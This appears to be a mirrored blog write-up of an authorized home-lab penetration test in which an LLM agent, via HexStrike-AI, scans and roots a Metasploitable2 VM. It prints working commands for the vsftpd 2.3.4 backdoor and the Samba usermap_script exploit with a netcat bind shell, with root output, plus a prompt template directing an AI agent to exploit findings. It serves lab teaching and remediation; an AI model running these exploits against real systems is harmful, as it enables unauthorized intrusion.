HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.

Cover image

Article Metadata

Category: CTI
Source article: https://medium.com/@1200km/hexstrike-openai-codex-ai-driven-exploitation-of-metasploitable-b892c07be39f
Published: 2026-01-03
Preserved media: 8 image(s), including cover images, screenshots, diagrams, and infographics where present.
Preserved technical blocks: 8 code/configuration block(s).

Ecosystem Fit

This page mirrors the original Medium article into the 1200km.com Docusaurus ecosystem. The original article flow, images, screenshots, infographics, and technical blocks are preserved from the export.

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction

AI-assisted penetration testing is no longer a concept — it is operational reality.

In this article, I walk through areal, authorizedpenetration test against my own lab host runningMetasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution throughHexStrike-AIto perform:

network discovery
enumeration and service fingerprinting
exploit selection and execution
proof collection (root-level command output)

This was not a simulation.

Real tools were executed. Real vulnerabilities were validated. And the target was compromised withunauthenticated root access— twice — via two independent attack paths.

Core Guides and Setup

HexStrike on Kali Linux 2025.4: A Comprehensive Guide

Focus: Initial setup and overview of the AI-powered offensive security framework.

HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape

Focus: Analysis of AI-orchestrated pentesting and its implications.

HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…

Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.

Practical Applications & Lab Comparisons

HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”

Focus: Practical lab comparison of orchestration quality between different AI security tools.

AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation

Focus: Step-by-step home lab application for network enumeration.

Specific Tooling & Technique Guides

What Is HexStrike-AI?

HexStrike-AI is not “another scanner.”

It is an orchestration layer that lets an LLM:

decide what security tools to run
execute them locally (or via SSH/MCP)
interpret outputs
adapt strategy dynamically (timeouts, missing tools, privilege constraints)
optionally run controlled exploitation with PoC evidence

In short:

The AI plans. HexStrike executes. Kali delivers the tools.

Test Scope & Authorization

This assessment was conducted under explicit authorization.

Scope

Target:172.16.163.129
**Environment:**private home lab (Metasploitable2 VM)
**Attacker:**Kali Linux environment with Codex CLI + HexStrike MCP

The Prompt That Started Everything

This is the “pattern” that makes LLM-driven pentesting actually work: you must demandexecution + evidence.

Example prompt structure (adapt it to your CLI):

Use the MCP server 
"hexstrike"
: Authorized pentest of 
172.16
.163
.129
Full service discovery
Enumerate versions
Identify 
vulnerabilities
 
(by severity)
Exploit critical findings
Provide 
proofs
 
(command output)

Key lesson: If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.

Phase 1: Reachability and Discovery

The first attempt targeted a wrong IP (172.16.59.129) and resulted in “host seems down.”

After correcting to:

172.16.163.129

The host responded immediately.

A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.

Phase 2: Enumeration & Service Fingerprinting

Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:

switched from SYN scan (-sS) to TCP connect (-sT)
used bounded host timeouts
reduced version intensity when needed

Confirmed exposed services (high-level)

The target exposed multiple legacy services typical of Metasploitable2:

FTP (21)
SSH (22)
Telnet (23)
SMTP (25)
DNS (53)
HTTP (80)
RPCbind (111)
SMB (139/445)
rlogin/rsh (513/514)
NFS (2049)
FTP alt (2121)
MySQL (3306)
PostgreSQL (5432)
VNC (5900)
X11 (6000)
AJP (8009)

Host identity confirmation

The HTTP landing page provided a definitive marker:

curl -s http://172.16.163.129:80 | 
head
 -n 5

Output included:

<title>Metasploitable2 - Linux</title>

At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.

Phase 3: Vulnerability Discovery (What Stood Out Immediately)

Two services were immediate critical flags due toknown RCE historyin this lab image:

vsftpd 2.3.4(commonly backdoored in lab builds)
Samba 3.0.20(classic usermap_script RCE path)

Rather than listing every CVE possible for every old service, the workflow focused on:

vulnerabilities withdirect, reliable exploitability
minimal risk of destabilizing the host
clear PoC output validation

Phase 4: Exploitation (With Proofs)

Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root

Why it worked

In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing:)triggers a backdoor listener (commonly on TCP/6200).

Step A — Trigger the backdoor

(printf 
"USER test:)
\r
\n
PASS test
\r
\n
QUIT
\r
\n
"
; sleep 
1
) 
|
 nc 
-
nv 
-
w 
2
 
172.16
.
163.129
 
21

This confirmed:

FTP reachable
banner:220 (vsFTPd 2.3.4)

Step B — Connect to backdoor shell and capture proof

printf 
"id
\n
uname -a
\n
whoami
\n
pwd
\n
"
 
|
 nc 
-
nv 
-
w 
3
 
172.16
.
163.129
 
6200

Proof (captured output):

uid
=
0
(
root
)
 gid
=
0
(
root
)
Linux metasploitable 
2.6
.
24
-
16
-server 
#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/

**Impact:**Unauthenticated Remote Code Execution →root.

No persistence was deployed. No further actions were taken.

Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell

Why it worked

Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.

Tooling nuance: why a bind shell was used

The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to abind shell payload, which is often more reliable in constrained environments.

Step A — Launch exploit with bind netcat payload (binds on port 4446)

msfconsole -q -x 
'use exploit/multi/samba/usermap_script; \
set
 RHOSTS 
172.16
.
163.129
; 
set
 RPORT 
139
; \
set
 payload cmd/unix/bind_netcat; \
set
 LPORT 
4446
; 
set
 DisablePayloadHandler 
true
; \
exploit -z; 
exit
 -y
'

Step B — Connect to bind shell and capture proof

printf 
"id
\n
uname -a
\n
whoami
\n
pwd
\n
"
 
|
 nc 
-
nv 
-
w 
3
 
172.16
.
163.129
 
4446

Proof (captured output):

uid
=
0
(
root
)
 gid
=
0
(
root
)
Linux metasploitable 
2.6
.
24
-
16
-server 
#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/

**Impact:**Unauthenticated Remote Code Execution →root.

Final Results Summary

What was validated

Broad service exposure consistent with Metasploitable2
Two separate unauthenticated root compromises, each independently sufficient for full takeover:
vsftpd backdoor (TCP/6200)
Samba usermap_script (bind shell on TCP/4446)

What was intentionally not done

No persistence / backdoors
No credential harvesting
No data collection beyond proof commands
No lateral movement testing

This kept the test strictly PoC-focused.

Remediation Recommendations (Real-World Perspective)

Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.

Critical

Remove backdoored/vulnerable services immediately
Never expose training VMs on networks shared with real assets
Enforce segmentation (lab VLAN / host-only networks)

High

Remove legacy cleartext and trust-based services:
Telnet
rsh/rlogin
VNC / X11 (unless strictly controlled)
Restrict SMB exposure and enforce modern versions/configs

Medium

Disable obsolete crypto (SSLv2) and weak ciphers
Remove version banners and harden HTTP stack
Restrict AJP to localhost/internal networks only

Low

Reduce attack surface: firewall by default, allowlist by source
Continuous inventory and exposure monitoring

Why This Matters

This test highlights the real value of AI in offensive workflows:

AI did not “replace” pentesting skills. Itamplifiedthem.

The LLM-driven workflow:

selected practical next steps
adapted to missing tools and privilege constraints
pivoted when sessions were unstable
still produced clean PoC artifacts

The operator still matters — but themental overhead drops sharply.

Final Thoughts

HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.

Ecosystem Fit​

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)​

Introduction​

Core Guides and Setup​

Practical Applications & Lab Comparisons​

Specific Tooling & Technique Guides​

What Is HexStrike-AI?​

Test Scope & Authorization​

Scope​

The Prompt That Started Everything​

Phase 1: Reachability and Discovery​

Phase 2: Enumeration & Service Fingerprinting​

Confirmed exposed services (high-level)​

Host identity confirmation​

Phase 3: Vulnerability Discovery (What Stood Out Immediately)​

Phase 4: Exploitation (With Proofs)​

Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root​

Why it worked​

Step A — Trigger the backdoor​

Step B — Connect to backdoor shell and capture proof​

Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell​

Why it worked​

Tooling nuance: why a bind shell was used​

Step A — Launch exploit with bind netcat payload (binds on port 4446)​

Step B — Connect to bind shell and capture proof​

Final Results Summary​

What was validated​

What was intentionally not done​

Remediation Recommendations (Real-World Perspective)​

Critical​

High​

Medium​

Low​

Why This Matters​

Final Thoughts​

Ecosystem Fit

How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction

Core Guides and Setup

Practical Applications & Lab Comparisons

Specific Tooling & Technique Guides

What Is HexStrike-AI?

Test Scope & Authorization

Scope

The Prompt That Started Everything

Phase 1: Reachability and Discovery

Phase 2: Enumeration & Service Fingerprinting

Confirmed exposed services (high-level)

Host identity confirmation

Phase 3: Vulnerability Discovery (What Stood Out Immediately)

Phase 4: Exploitation (With Proofs)

Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root

Why it worked

Step A — Trigger the backdoor

Step B — Connect to backdoor shell and capture proof

Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell

Why it worked

Tooling nuance: why a bind shell was used

Step A — Launch exploit with bind netcat payload (binds on port 4446)

Step B — Connect to bind shell and capture proof

Final Results Summary

What was validated

What was intentionally not done

Remediation Recommendations (Real-World Perspective)

Critical

High

Medium

Low

Why This Matters

Final Thoughts